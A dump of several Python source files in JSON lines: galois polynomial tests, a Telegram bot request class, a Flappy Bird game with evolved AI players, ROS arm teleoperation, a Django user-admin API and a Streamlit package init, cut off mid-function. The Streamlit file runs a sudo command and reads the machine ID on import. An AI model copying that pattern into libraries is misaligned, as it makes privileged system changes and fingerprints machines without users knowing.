field\n assert p.degree == 2\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_integer(field):\n integer = field.order + 1 # Corresponds to p(x) = x + 1\n p = galois.Poly.Integer(integer, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 1\n assert np.array_equal(p.nonzero_degrees, [1,0])\n assert np.array_equal(p.nonzero_coeffs, [1,1])\n assert np.array_equal(p.degrees, [1,0])\n assert np.array_equal(p.coeffs, [1,1])\n assert p.integer == integer\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_degrees(field):\n # Corresponds to p(x) = x^2 + 1\n degrees = [2,0]\n coeffs = [1,1]\n p = galois.Poly.Degrees(degrees, coeffs, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 2\n assert np.array_equal(p.nonzero_degrees, [2,0])\n assert np.array_equal(p.nonzero_coeffs, [1,1])\n assert np.array_equal(p.degrees, [2,1,0])\n assert np.array_equal(p.coeffs, [1,0,1])\n assert p.integer == field.order**2 + 1\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_roots(field):\n a, b = field.Random(), field.Random()\n roots = [a, b] # p(x) = (x - a)*(x - b)\n degree = 2\n degrees = [2, 1, 0]\n coeffs = [1, -a + -b, (-a)*(-b)]\n nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]\n nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]\n integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])\n\n p = galois.Poly.Roots(roots, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == degree\n assert np.array_equal(p.nonzero_degrees, nonzero_degrees)\n assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)\n assert np.array_equal(p.degrees, degrees)\n assert np.array_equal(p.coeffs, coeffs)\n assert p.integer == integer\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_roots_with_multiplicity(field):\n a = field.Random()\n roots = [a] # p(x) = (x - a)*(x - a)\n multiplicities = [2]\n degree = 2\n degrees = [2, 1, 0]\n coeffs = [1, -a + -a, (-a)*(-a)]\n nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]\n nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]\n integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])\n\n p = galois.Poly.Roots(roots, multiplicities=multiplicities, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == degree\n assert np.array_equal(p.nonzero_degrees, nonzero_degrees)\n assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)\n assert np.array_equal(p.degrees, degrees)\n assert np.array_equal(p.coeffs, coeffs)\n assert p.integer == integer\n"} {"ext": "py", "sha": "1a3067bc4e8a963488a35ed23b8bd57e5673563c", "content": "# Copyright (C) 2015-2022 by Vd.\n# This file is part of Rocketgram, the modern Telegram bot framework.\n# Rocketgram is released under the MIT License (see LICENSE).\n\n\nfrom dataclasses import dataclass\nfrom typing import Union, Optional, List\n\nfrom .input_file import InputFile\nfrom .message_entity import MessageEntity\nfrom .parse_mode_type import ParseModeType\nfrom .request import Request\nfrom .utils import ALL_KEYBOARDS, MessageResultMixin\n\n\n@dataclass(frozen=True)\nclass SendAudio(MessageResultMixin, Request):\n \"\"\"\\\n Represents SendAudio request object:\n https://core.telegram.org/bots/api#sendaudio\n \"\"\"\n\n chat_id: Union[int, str]\n audio: Union[InputFile, str]\n caption: Optional[str] = None\n parse_mode: Optional[ParseModeType] = None\n caption_entities: 
Optional[List[MessageEntity]] = None\n duration: Optional[int] = None\n performer: Optional[str] = None\n title: Optional[str] = None\n thumb: Optional[Union[InputFile, str]] = None\n disable_notification: Optional[bool] = None\n protect_content: Optional[bool] = None\n reply_to_message_id: Optional[int] = None\n allow_sending_without_reply: Optional[bool] = None\n reply_markup: Optional[ALL_KEYBOARDS] = None\n\n def files(self) -> List[InputFile]:\n out = list()\n if isinstance(self.audio, InputFile):\n out.append(self.audio)\n if isinstance(self.thumb, InputFile):\n out.append(self.thumb)\n return out\n"} {"ext": "py", "sha": "1a3068a3585c91ebdc0587aa47980a1f82baca30", "content": "import pyglet\nfrom pyglet.window import key\nfrom pyglet.window.key import MOD_SHIFT\nfrom CGP import Individual, create_pop, evolve\n\nfrom load import *\n\ngame_window = pyglet.window.Window(1600, 1000)\npyglet.resource.path = ['../assets']\npyglet.resource.reindex()\n\nmain_batch = pyglet.graphics.Batch()\npillar_batch = pyglet.graphics.Batch()\nai_batch = pyglet.graphics.Batch()\n\nlabel_score = labels(batch=main_batch)\nlabel_alive = labels(y=520, batch=main_batch)\nlabel_best = labels(y=540, batch=main_batch)\nlabel_generation = labels(y=560, batch=main_batch)\npillars = new_pillar(pillar_batch)\n\ncompletion = False\nscore = 0\nbest_score = 0 # FIXME\ntime_count = 0\nflag = 0\nalive = 0\ngeneration = 1\nai_num = \"\"\npop = None\n\nbirds_obj = []\nai_birds_obj = []\n\n\ndef create_ai_bird(pops):\n global alive, ai_num\n for ind in pops:\n ai_birds_obj.append(new_ai_birds(individual=ind, batch=ai_batch))\n alive += 1\n ai_num = str(alive)\n\n\ndef clear_game():\n global pillars, generation, score, time_count\n for obj in pillars:\n obj.delete()\n pillars.remove(obj)\n for obj in birds_obj:\n obj.delete()\n birds_obj.remove(obj)\n generation += 1\n score = 0\n time_count = 0\n pillars = new_pillar(pillar_batch)\n\n\ndef init():\n global birds_obj, score\n\n score = 0\n label_score.text = \"Score: \" + str(score)\n\n birds_obj.append(new_birds(main_batch))\n\n\ndef init_pop():\n global ai_birds_obj, alive, ai_num, pop\n pop = create_pop(10)\n create_ai_bird(pop)\n label_alive.text = \"Alive: \" + str(alive) + \"/\" + ai_num\n label_generation.text = \"Generation: \" + str(generation)\n label_best.text = \"Best score: \" + str(best_score)\n\n\n@game_window.event\ndef on_draw():\n global completion\n game_window.clear()\n main_batch.draw()\n pillar_batch.draw()\n ai_batch.draw()\n for b in birds_obj:\n game_window.push_handlers(b.get_key_handler())\n\n\n@game_window.event\ndef on_key_press(symbol, modifiers):\n # add a new player bird\n if modifiers & MOD_SHIFT:\n if symbol == key.N:\n birds_obj.extend([new_birds(main_batch)])\n\n # make it faster\n if modifiers & MOD_SHIFT:\n if symbol == key.EQUAL:\n print(\"speed up\")\n pyglet.clock.schedule_interval(update, 1 / 120.0)\n\n # make it stop\n if modifiers & MOD_SHIFT:\n if symbol == key.BACKSPACE:\n print(\"stop\")\n pyglet.clock.unschedule(update)\n\n\ndef update(dt):\n global completion, score, time_count, flag, alive, pop, best_score\n time_count += 1\n\n # update\n for b in birds_obj:\n b.update(dt)\n # check collide\n if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):\n b.dead = True\n for p in pillars:\n p.update(dt)\n for b in ai_birds_obj:\n if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):\n b.dead = True\n b.update(dt)\n # flap or not\n b.check_flap(pillars[0].x, pillars[0].y)\n\n # check pillars out of bounds\n if 
pillars[0].check_bounds():\n pillars[0].dead = True\n pillars[1].dead = True\n\n # remove dead objects\n for to_remove in [obj for obj in pillars if obj.dead]:\n to_remove.delete()\n pillars.remove(to_remove)\n for to_remove in [obj for obj in birds_obj if obj.dead]:\n to_remove.delete()\n birds_obj.remove(to_remove)\n for to_remove in [obj for obj in ai_birds_obj if obj.dead]:\n alive -= 1\n to_remove.delete()\n ai_birds_obj.remove(to_remove)\n\n # add new pillars and reset flag for score\n if time_count % 240 == 0:\n time_count = 0\n flag = 0\n add_pillars = new_pillar(pillar_batch)\n pillars.extend(add_pillars)\n\n# label\n # score\n if flag == 0 and (len(birds_obj) > 0 or len(ai_birds_obj) > 0) and pillars[0].check_score():\n # print(time_count)\n flag += 1\n score += 1\n label_score.text = \"Score: \" + str(int(score))\n # check alive AI\n label_alive.text = \"Alive: \" + str(alive) + \"/\" + ai_num\n # check best score\n if score > best_score:\n best_score = score\n label_best.text = \"Best score: \" + str(best_score)\n # check generation\n label_generation.text = \"Generation: \" + str(generation)\n\n # evolve AI\n if alive == 0:\n pop = evolve(pop, 0.03, 4, 6)\n clear_game()\n create_ai_bird(pop)\n\n\nif __name__ == '__main__':\n init()\n init_pop()\n # init_ai()\n\n pyglet.clock.schedule_interval(update, 1 / 120.0)\n\n pyglet.app.run()\n"} {"ext": "py", "sha": "1a306966b719ef85a751c4fa1585f2a559fe9a4c", "content": "r\"\"\"\nRemote (pmaf.remote)\n====================\n\nExploit remote databases\n------------------------\n\nClasses\n-------\n\n.. autosummary::\n :toctree: generated/\n\n Entrez\n\n\"\"\"\nfrom ._entrez import Entrez\n\n__all__ = ['Entrez']"} {"ext": "py", "sha": "1a306a2a2dcf52f5e93c5095b38aed6e762c91ea", "content": "import rospy\n\nfrom std_msgs.msg import Float64\n\nimport sys, select, termios, tty\n\nmsg = \"\"\"\nMove the Arm Links !!\n---------------------------\nRotating (i), Picking(l) and Jaw Arm(o):\n u i o\n j k l\n m , .\n\nspace key, k : force stop\nanything else : stop smoothly\nCTRL-C to quit\n\"\"\"\n\nmoveBindings = {\n 'i':(1,0),\n 'o':(1,-1),\n 'j':(0,1),\n 'l':(0,-1),\n 'u':(1,1),\n ',':(-1,0),\n '.':(-1,1),\n 'm':(-1,-1),\n }\n\nspeedBindings={\n 'q':(1.1,1.1),\n 'z':(.9,.9),\n 'w':(1.1,1),\n 'x':(.9,1),\n 'e':(1,1.1),\n 'c':(1,.9),\n }\n\ndef getKey():\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], 0.1)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\nspeed = 0.1\nturn = 0.8\n\ndef vels(speed,turn):\n return \"currently:\\tspeed %s\\tturn %s \" % (speed,turn)\n\nif __name__==\"__main__\":\n settings = termios.tcgetattr(sys.stdin)\n\n rospy.init_node('arm_teleop')\n\n pub_pick = rospy.Publisher('/robot_arm/picking_arm_controller/command', Float64, queue_size = 10) # Picking Arm controller\n pub_rotate = rospy.Publisher('/robot_arm/rotating_arm_controller/command', Float64, queue_size = 10) # Rotating Arm controller\n pub_jaw = rospy.Publisher('/robot_arm/jaw_arm_controller/command', Float64, queue_size = 10) # Jaw Arm controller\n\n x = 1\n th = 0\n status = 0\n count = 0\n acc = 0.1\n target_speed = 0\n target_turn = 0\n control_speed = 0\n control_turn = 0\n speed = 8\n try:\n print msg\n print vels(speed,turn)\n while(1):\n key = getKey()\n if key in moveBindings.keys():\n x = moveBindings[key][0]\n th = moveBindings[key][1]\n count = 0\n elif key in speedBindings.keys():\n speed = speed * speedBindings[key][0]\n turn = 
turn * speedBindings[key][1]\n count = 0\n\n print vels(speed,turn)\n if (status == 14):\n print msg\n status = (status + 1) % 15\n elif key == ' ' or key == 'k' :\n x = 0\n th = 0\n control_speed = 0\n control_turn = 0\n else:\n count = count + 1\n if count > 10:\n x = 0\n th = 0\n\t\t pass\n if (key == '\\x03'):\n break\n\n target_speed = speed * x\n target_turn = turn * th\n\n if target_speed > control_speed:\n control_speed = min( target_speed, control_speed + 0.02 )\n elif target_speed < control_speed:\n control_speed = max( target_speed, control_speed - 0.02 )\n else:\n control_speed = target_speed\n\n if target_turn > control_turn:\n control_turn = min( target_turn, control_turn + 0.1 )\n elif target_turn < control_turn:\n control_turn = max( target_turn, control_turn - 0.1 )\n else:\n control_turn = target_turn\n\n pub_pick.publish(control_turn) # Picking Arm speed\n pub_rotate.publish(control_speed) # Rotating Arm speed\n pub_jaw.publish(control_turn) # Jaw Arm speed\n\n\n except:\n print e\n\n finally:\n pub_pick.publish(control_turn) # Picking Arm speed\n pub_rotate.publish(control_speed) # Rotating Arm speed\n pub_jaw.publish(control_turn) # Jaw Arm speed\n\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n"} {"ext": "py", "sha": "1a306abb7ff91026b161aeec3c83ee5cd270bbb2", "content": "import os\nimport argus\n\n_example = argus.EXAMPLE_DRAG_CLOTH\n\npython_path = os.path.dirname(os.path.realpath(__file__))\nargus_interface = os.path.join(python_path, 'argus_interface.py')\n\nos.system('python {} -e {}'.format(argus_interface, _example))"} {"ext": "py", "sha": "1a306b2e32fa597fe500c61d1affcd6e636d84e9", "content": "import os\nimport re\nimport xlsxwriter\n\nfrom django.db import transaction, IntegrityError\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.contrib.auth.hashers import make_password\n\nfrom submission.models import Submission\nfrom utils.api import APIView, validate_serializer\nfrom utils.shortcuts import rand_str\n\nfrom ..decorators import super_admin_required\nfrom ..models import AdminType, ProblemPermission, User, UserProfile\nfrom ..serializers import EditUserSerializer, UserAdminSerializer, GenerateUserSerializer\nfrom ..serializers import ImportUserSeralizer\n\n\nclass UserAdminAPI(APIView):\n @validate_serializer(ImportUserSeralizer)\n @super_admin_required\n def post(self, request):\n \"\"\"\n Import User\n \"\"\"\n data = request.data[\"users\"]\n\n user_list = []\n for user_data in data:\n if len(user_data) != 3 or len(user_data[0]) > 32:\n return self.error(f\"Error occurred while processing data '{user_data}'\")\n user_list.append(User(username=user_data[0], password=make_password(user_data[1]), email=user_data[2]))\n\n try:\n with transaction.atomic():\n ret = User.objects.bulk_create(user_list)\n UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])\n return self.success()\n except IntegrityError as e:\n # Extract detail from exception message\n # duplicate key value violates unique constraint \"user_username_key\"\n # DETAIL: Key (username)=(root11) already exists.\n return self.error(str(e).split(\"\\n\")[1])\n\n @validate_serializer(EditUserSerializer)\n @super_admin_required\n def put(self, request):\n \"\"\"\n Edit user api\n \"\"\"\n data = request.data\n if not data[\"sno\"].isdigit():\n return self.error(\"Student ID must be digital\")\n try:\n user = User.objects.get(id=data[\"id\"])\n except User.DoesNotExist:\n return self.error(\"User does not exist\")\n if 
User.objects.filter(username=data[\"username\"].lower()).exclude(id=user.id).exists():\n return self.error(\"Username already exists\")\n if User.objects.filter(email=data[\"email\"].lower()).exclude(id=user.id).exists():\n return self.error(\"Email already exists\")\n if User.objects.filter(sno=data[\"sno\"]).exclude(id=user.id).exists():\n return self.error(\"Student ID already exists\")\n\n pre_username = user.username\n user.username = data[\"username\"].lower()\n user.sno = data[\"sno\"]\n user.email = data[\"email\"].lower()\n user.admin_type = data[\"admin_type\"]\n user.is_disabled = data[\"is_disabled\"]\n\n if data[\"admin_type\"] == AdminType.ADMIN:\n user.problem_permission = data[\"problem_permission\"]\n elif data[\"admin_type\"] == AdminType.SUPER_ADMIN:\n user.problem_permission = ProblemPermission.ALL\n else:\n user.problem_permission = ProblemPermission.NONE\n\n if data[\"password\"]:\n user.set_password(data[\"password\"])\n\n if data[\"open_api\"]:\n # Avoid reset user appkey after saving changes\n if not user.open_api:\n user.open_api_appkey = rand_str()\n else:\n user.open_api_appkey = None\n user.open_api = data[\"open_api\"]\n\n if data[\"two_factor_auth\"]:\n # Avoid reset user tfa_token after saving changes\n if not user.two_factor_auth:\n user.tfa_token = rand_str()\n else:\n user.tfa_token = None\n\n user.two_factor_auth = data[\"two_factor_auth\"]\n\n user.save()\n if pre_username != user.username:\n Submission.objects.filter(username=pre_username).update(username=user.username)\n\n UserProfile.objects.filter(user=user).update(real_name=data[\"real_name\"])\n return self.success(UserAdminSerializer(user).data)\n\n @super_admin_required\n def get(self, request):\n \"\"\"\n User list api / Get user by id\n \"\"\"\n user_id = request.GET.get(\"id\")\n if user_id:\n try:\n user = User.objects.get(id=user_id)\n except User.DoesNotExist:\n return self.error(\"User does not exist\")\n return self.success(UserAdminSerializer(user).data)\n\n user = User.objects.all().order_by(\"-create_time\")\n\n keyword = request.GET.get(\"keyword\", None)\n if keyword:\n user = user.filter(Q(username__icontains=keyword) |\n Q(userprofile__real_name__icontains=keyword) |\n Q(email__icontains=keyword))\n return self.success(self.paginate_data(request, user, UserAdminSerializer))\n\n @super_admin_required\n def delete(self, request):\n id = request.GET.get(\"id\")\n if not id:\n return self.error(\"Invalid Parameter, id is required\")\n ids = id.split(\",\")\n if str(request.user.id) in ids:\n return self.error(\"Current user can not be deleted\")\n User.objects.filter(id__in=ids).delete()\n return self.success()\n\n\nclass GenerateUserAPI(APIView):\n @super_admin_required\n def get(self, request):\n \"\"\"\n download users excel\n \"\"\"\n file_id = request.GET.get(\"file_id\")\n if not file_id:\n return self.error(\"Invalid Parameter, file_id is required\")\n if not re.match(r\"^[a-zA-Z0-9]+$\", file_id):\n return self.error(\"Illegal file_id\")\n file_path = f\"/tmp/{file_id}.xlsx\"\n if not os.path.isfile(file_path):\n return self.error(\"File does not exist\")\n with open(file_path, \"rb\") as f:\n raw_data = f.read()\n os.remove(file_path)\n response = HttpResponse(raw_data)\n response[\"Content-Disposition\"] = f\"attachment; filename=users.xlsx\"\n response[\"Content-Type\"] = \"application/xlsx\"\n return response\n\n @validate_serializer(GenerateUserSerializer)\n @super_admin_required\n def post(self, request):\n \"\"\"\n Generate User\n \"\"\"\n data = request.data\n 
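        # Usernames are built as f"{prefix}{number}{suffix}" for every number in the
        # inclusive range [number_from, number_to]; the length check below uses the
        # widest of the two bounds so no generated username can exceed 32 characters.
        # Each user gets a random password of password_length characters, and the
        # username/password pairs are written to a temporary xlsx named after a random
        # file_id, which the GET handler above streams back as a download.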
number_max_length = max(len(str(data[\"number_from\"])), len(str(data[\"number_to\"])))\n if number_max_length + len(data[\"prefix\"]) + len(data[\"suffix\"]) > 32:\n return self.error(\"Username should not more than 32 characters\")\n if data[\"number_from\"] > data[\"number_to\"]:\n return self.error(\"Start number must be lower than end number\")\n\n file_id = rand_str(8)\n filename = f\"/tmp/{file_id}.xlsx\"\n workbook = xlsxwriter.Workbook(filename)\n worksheet = workbook.add_worksheet()\n worksheet.set_column(\"A:B\", 20)\n worksheet.write(\"A1\", \"Username\")\n worksheet.write(\"B1\", \"Password\")\n i = 1\n\n user_list = []\n for number in range(data[\"number_from\"], data[\"number_to\"] + 1):\n raw_password = rand_str(data[\"password_length\"])\n user = User(username=f\"{data['prefix']}{number}{data['suffix']}\", password=make_password(raw_password))\n user.raw_password = raw_password\n user_list.append(user)\n\n try:\n with transaction.atomic():\n\n ret = User.objects.bulk_create(user_list)\n UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])\n for item in user_list:\n worksheet.write_string(i, 0, item.username)\n worksheet.write_string(i, 1, item.raw_password)\n i += 1\n workbook.close()\n return self.success({\"file_id\": file_id})\n except IntegrityError as e:\n # Extract detail from exception message\n # duplicate key value violates unique constraint \"user_username_key\"\n # DETAIL: Key (username)=(root11) already exists.\n return self.error(str(e).split(\"\\n\")[1])\n"} {"ext": "py", "sha": "1a306d74c0958fc49aa211201e934089b0d6794d", "content": "# Copyright 2018-2020 Streamlit Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Streamlit.\n\nHow to use Streamlit in 3 seconds:\n\n 1. Write an app\n >>> import streamlit as st\n >>> st.write(anything_you_want)\n\n 2. Run your app\n $ streamlit run my_script.py\n\n 3. Use your app\n A new tab will open on your browser. That's your Streamlit app!\n\n 4. Modify your code, save it, and watch changes live on your browser.\n\nTake a look at the other commands in this module to find out what else\nStreamlit can do:\n\n >>> dir(streamlit)\n\nOr try running our \"Hello World\":\n\n $ streamlit hello\n\nFor more detailed info, see https://docs.streamlit.io.\n\"\"\"\n\n# IMPORTANT: Prefix with an underscore anything that the user shouldn't see.\n\n# NOTE: You'll see lots of \"noqa: F821\" in this file. That's because we\n# manually mess with the local namespace so the linter can't know that some\n# identifiers actually exist in the namespace.\n\n# Must be at the top, to avoid circular dependency.\nfrom streamlit import logger as _logger\nfrom streamlit import config as _config\n\n_LOGGER = _logger.get_logger(\"root\")\n\n# Give the package a version.\nimport pkg_resources as _pkg_resources\nimport uuid as _uuid\nimport subprocess\nimport platform\nimport os\nfrom typing import Any, List, Tuple, Type\n\n# This used to be pkg_resources.require('streamlit') but it would cause\n# pex files to fail. 
See #394 for more details.\n__version__ = _pkg_resources.get_distribution(\"streamlit\").version\n\n# Deterministic Unique Streamlit User ID\nif (\n platform.system() == \"Linux\"\n and os.path.isfile(\"/etc/machine-id\") == False\n and os.path.isfile(\"/var/lib/dbus/machine-id\") == False\n):\n print(\"Generate machine-id\")\n subprocess.run([\"sudo\", \"dbus-uuidgen\", \"--ensure\"])\n\nmachine_id = str(_uuid.getnode())\nif os.path.isfile(\"/etc/machine-id\"):\n with open(\"/etc/machine-id\", \"r\") as f:\n machine_id = f.read()\nelif os.path.isfile(\"/var/lib/dbus/machine-id\"):\n with open(\"/var/lib/dbus/machine-id\", \"r\") as f:\n machine_id = f.read()\n\n__installation_id__ = str(_uuid.uuid5(_uuid.NAMESPACE_DNS, machine_id))\n\n\nimport contextlib as _contextlib\nimport re as _re\nimport sys as _sys\nimport textwrap as _textwrap\nimport threading as _threading\nimport traceback as _traceback\nimport types as _types\nimport json as _json\nimport numpy as _np\n\nfrom streamlit import code_util as _code_util\nfrom streamlit import env_util as _env_util\nfrom streamlit import source_util as _source_util\nfrom streamlit import string_util as _string_util\nfrom streamlit import type_util as _type_util\nfrom streamlit.DeltaGenerator import DeltaGenerator as _DeltaGenerator\nfrom streamlit.ReportThread import add_report_ctx as _add_report_ctx\nfrom streamlit.ReportThread import get_report_ctx as _get_report_ctx\nfrom streamlit.errors import StreamlitAPIException\nfrom streamlit.proto import BlockPath_pb2 as _BlockPath_pb2\nfrom streamlit.util import functools_wraps as _functools_wraps\n\n# Modules that the user should have access to. These are imported with \"as\"\n# syntax pass mypy checking with implicit_reexport disabled.\nfrom streamlit.caching import cache as cache # noqa: F401\n\n# This is set to True inside cli._main_run(), and is False otherwise.\n# If False, we should assume that DeltaGenerator functions are effectively\n# no-ops, and adapt gracefully.\n_is_running_with_streamlit = False\n\n\ndef _set_log_level():\n _logger.set_log_level(_config.get_option(\"global.logLevel\").upper())\n _logger.init_tornado_logs()\n\n\n# Make this file only depend on config option in an asynchronous manner. 
This\n# avoids a race condition when another file (such as a test file) tries to pass\n# in an alternative config.\n_config.on_config_parsed(_set_log_level, True)\n\n\n_main = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.MAIN)\nsidebar = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.SIDEBAR)\n\n# DeltaGenerator methods:\n\naltair_chart = _main.altair_chart # noqa: E221\narea_chart = _main.area_chart # noqa: E221\naudio = _main.audio # noqa: E221\nballoons = _main.balloons # noqa: E221\nbar_chart = _main.bar_chart # noqa: E221\nbokeh_chart = _main.bokeh_chart # noqa: E221\nbutton = _main.button # noqa: E221\ncheckbox = _main.checkbox # noqa: E221\ncode = _main.code # noqa: E221\ndataframe = _main.dataframe # noqa: E221\ndate_input = _main.date_input # noqa: E221\ndeck_gl_chart = _main.deck_gl_chart # noqa: E221\npydeck_chart = _main.pydeck_chart # noqa: E221\nempty = _main.empty # noqa: E221\nerror = _main.error # noqa: E221\nexception = _main.exception # noqa: E221\nbeta_set_favicon = _main.favicon # noqa: E221\nfile_uploader = _main.file_uploader # noqa: E221\ngraphviz_chart = _main.graphviz_chart # noqa: E221\nheader = _main.header # noqa: E221\nhelp = _main.help # noqa: E221\nimage = _main.image # noqa: E221\ninfo = _main.info # noqa: E221\njson = _main.json # noqa: E221\nlatex = _main.latex # noqa: E221\nline_chart = _main.line_chart # noqa: E221\nmap = _main.map # noqa: E221\nmarkdown = _main.markdown # noqa: E221\nmultiselect = _main.multiselect # noqa: E221\nnumber_input = _main.number_input # noqa: E221\nplotly_chart = _main.plotly_chart # noqa: E221\nprogress = _main.progress # noqa: E221\npyplot = _main.pyplot # noqa: E221\nradio = _main.radio # noqa: E221\nselectbox = _main.selectbox # noqa: E221\nslider = _main.slider # noqa: E221\nsubheader = _main.subheader # noqa: E221\nsuccess = _main.success # noqa: E221\ntable = _main.table # noqa: E221\ntext = _main.text # noqa: E221\ntext_area = _main.text_area # noqa: E221\ntext_input = _main.text_input # noqa: E221\ntime_input = _main.time_input # noqa: E221\ntitle = _main.title # noqa: E221\nvega_lite_chart = _main.vega_lite_chart # noqa: E221\nvideo = _main.video # noqa: E221\nwarning = _main.warning # noqa: E221\nbeta_color_picker = _main.beta_color_picker # noqa: E221\n\n# Config\n\nget_option = _config.get_option\n\n\ndef set_option(key, value):\n \"\"\"Set config option.\n\n Currently, only two config options can be set within the script itself:\n * client.caching\n * client.displayEnabled\n\n Calling with any other options will raise StreamlitAPIException.\n\n Run `streamlit config show` in the terminal to see all available options.\n\n Parameters\n ----------\n key : str\n The config option key of the form \"section.optionName\". To see all\n available options, run `streamlit config show` on a terminal.\n\n value\n The new value to assign to this config option.\n\n \"\"\"\n opt = _config._config_options[key]\n if opt.scriptable:\n _config.set_option(key, value)\n return\n\n raise StreamlitAPIException(\n \"{key} cannot be set on the fly. Set as command line option, e.g. 
streamlit run script.py --{key}, or in config.toml instead.\".format(\n key=key\n )\n )\n\n\n# Special methods:\n\n_HELP_TYPES = (\n _types.BuiltinFunctionType,\n _types.BuiltinMethodType,\n _types.FunctionType,\n _types.MethodType,\n _types.ModuleType,\n) # type: Tuple[Type[Any], ...]\n\n\ndef write(*args, **kwargs):\n \"\"\"Write arguments to the app.\n\n This is the Swiss Army knife of Streamlit commands: it does different\n things depending on what you throw at it. Unlike other Streamlit commands,\n write() has some unique properties:\n\n 1. You can pass in multiple arguments, all of which will be written.\n 2. Its behavior depends on the input types as follows.\n 3. It returns None, so it's \"slot\" in the App cannot be reused.\n\n Parameters\n ----------\n *args : any\n One or many objects to print to the App.\n\n Arguments are handled as follows:\n\n - write(string) : Prints the formatted Markdown string, with\n support for LaTeX expression and emoji shortcodes.\n See docs for st.markdown for more.\n - write(data_frame) : Displays the DataFrame as a table.\n - write(error) : Prints an exception specially.\n - write(func) : Displays information about a function.\n - write(module) : Displays information about the module.\n - write(dict) : Displays dict in an interactive widget.\n - write(obj) : The default is to print str(obj).\n - write(mpl_fig) : Displays a Matplotlib figure.\n - write(altair) : Displays an Altair chart.\n - write(keras) : Displays a Keras model.\n - write(graphviz) : Displays a Graphviz graph.\n - write(plotly_fig) : Displays a Plotly figure.\n - write(bokeh_fig) : Displays a Bokeh figure.\n - write(sympy_expr) : Prints SymPy expression using LaTeX.\n\n unsafe_allow_html : bool\n This is a keyword-only argument that defaults to False.\n\n By default, any HTML tags found in strings will be escaped and\n therefore treated as pure text. This behavior may be turned off by\n setting this argument to True.\n\n That said, *we strongly advise* against it*. It is hard to write secure\n HTML, so by using this argument you may be compromising your users'\n security. For more information, see:\n\n https://github.com/streamlit/streamlit/issues/152\n\n **Also note that `unsafe_allow_html` is a temporary measure and may be\n removed from Streamlit at any time.**\n\n If you decide to turn on HTML anyway, we ask you to please tell us your\n exact use case here:\n https://discuss.streamlit.io/t/96 .\n\n This will help us come up with safe APIs that allow you to do what you\n want.\n\n Example\n -------\n\n Its simplest use case is to draw Markdown-formatted text, whenever the\n input is a string:\n\n >>> write('Hello, *World!* :sunglasses:')\n\n .. output::\n https://share.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE\n height: 50px\n\n As mentioned earlier, `st.write()` also accepts other data formats, such as\n numbers, data frames, styled data frames, and assorted objects:\n\n >>> st.write(1234)\n >>> st.write(pd.DataFrame({\n ... 'first column': [1, 2, 3, 4],\n ... 'second column': [10, 20, 30, 40],\n ... }))\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD\n height: 250px\n\n Finally, you can pass in multiple arguments to do things like:\n\n >>> st.write('1 + 1 = ', 2)\n >>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1\n height: 300px\n\n Oh, one more thing: `st.write` accepts chart objects too! 
For example:\n\n >>> import pandas as pd\n >>> import numpy as np\n >>> import altair as alt\n >>>\n >>> df = pd.DataFrame(\n ... np.random.randn(200, 3),\n ... columns=['a', 'b', 'c'])\n ...\n >>> c = alt.Chart(df).mark_circle().encode(\n ... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])\n >>>\n >>> st.write(c)\n\n .. output::\n https://share.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5\n height: 200px\n\n \"\"\"\n try:\n string_buffer = [] # type: List[str]\n unsafe_allow_html = kwargs.get(\"unsafe_allow_html\", False)\n\n def flush_buffer():\n if string_buffer:\n markdown(\n \" \".join(string_buffer), unsafe_allow_html=unsafe_allow_html,\n ) # noqa: F821\n string_buffer[:] = []\n\n for arg in args:\n # Order matters!\n if isinstance(arg, str):\n string_buffer.append(arg)\n elif _type_util.is_dataframe_like(arg):\n flush_buffer()\n if len(_np.shape(arg)) > 2:\n text(arg)\n else:\n dataframe(arg) # noqa: F821\n elif isinstance(arg, Exception):\n flush_buffer()\n exception(arg) # noqa: F821\n elif isinstance(arg, _HELP_TYPES):\n flush_buffer()\n help(arg)\n elif _type_util.is_altair_chart(arg):\n flush_buffer()\n altair_chart(arg)\n elif _type_util.is_type(arg, \"matplotlib.figure.Figure\"):\n flush_buffer()\n pyplot(arg)\n elif _type_util.is_plotly_chart(arg):\n flush_buffer()\n 